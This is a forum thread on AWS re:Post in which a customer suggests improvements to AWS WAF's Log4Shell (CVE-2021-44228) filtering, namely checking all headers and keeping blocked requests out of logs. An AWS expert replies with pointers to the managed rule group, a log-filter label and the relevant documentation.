Usando AWS re:Post, accetti AWS re:Post Termini di utilizzo
AWS re:Postre:Post

WAF Setting CVE-2021-44228

0

Dear AWS,

thank you for reacting so quickliy to mitigate CVE-2021-44228. We have enabled AWS WAF for our workloads but see some room for improvement:

check all headers

It looks as if the WAF filteres nicely all strings that might result in an JNDI call. But it looks as if not every header is checked. So we see 'x-forward-for' or 'http_user_agent' headers in our logs that contain malicious data without being blocked (they have Status Code 200 instead of 403). Examples: ;-) are not possible due to the AWS WAF.

suppress malicious content

Even if the WAF works nicely and blocks the malicious content, an entry is written to the logs. So a unpatched system reading this log will be bitten by the vulnerability. In our case it is the AWS Opensearch and we should be fine. But the possibility to have something like "don't log blocked requests" might be an idea for improvement. Doing so on the AWS side would help people to really "don't even get in contact" with malicious content.

Just my 2 cents ;-)

Warm regards from Munich!

Thorsten

Argomenti
Sicurezza, identità e conformità
Tag
AWS WAF
Lingua
English
Matrix
posta 2 anni fa368 visualizzazioni
1 Risposta
0

Hi Thorsten,

thank you for the feedback. We continue to iterate the AWSManagedRulesKnownBadInputsRuleSet Rule Group as we learn more. To receive automatic updates to the AWSManagedRulesKnownBadInputsRuleSet, please choose the default version - see https://aws.amazon.com/security/security-bulletins/AWS-2021-006/ for the latest updates.

Re the log filtering, you can add filtering to specify which web requests are kept in the logs and which are dropped. You can filter on the rule action and on the web request labels that were applied during the request evaluation. You can use the awswaf:managed:aws:known-bad-inputs:Log4JRCE label as log filter. See https://docs.aws.amazon.com/waf/latest/developerguide/logging-management.html and https://docs.aws.amazon.com/waf/latest/developerguide/aws-managed-rule-groups-baseline.html#aws-managed-rule-groups-baseline-known-bad-inputs for additional details.

AWS
ESPERTO
Luca_I
con risposta 2 anni fa

Accesso non effettuato. Accedi per postare una risposta.

Una buona risposta soddisfa chiaramente la domanda, fornisce un feedback costruttivo e incoraggia la crescita professionale del richiedente.

Linee guida per rispondere alle domande

Contenuto pertinente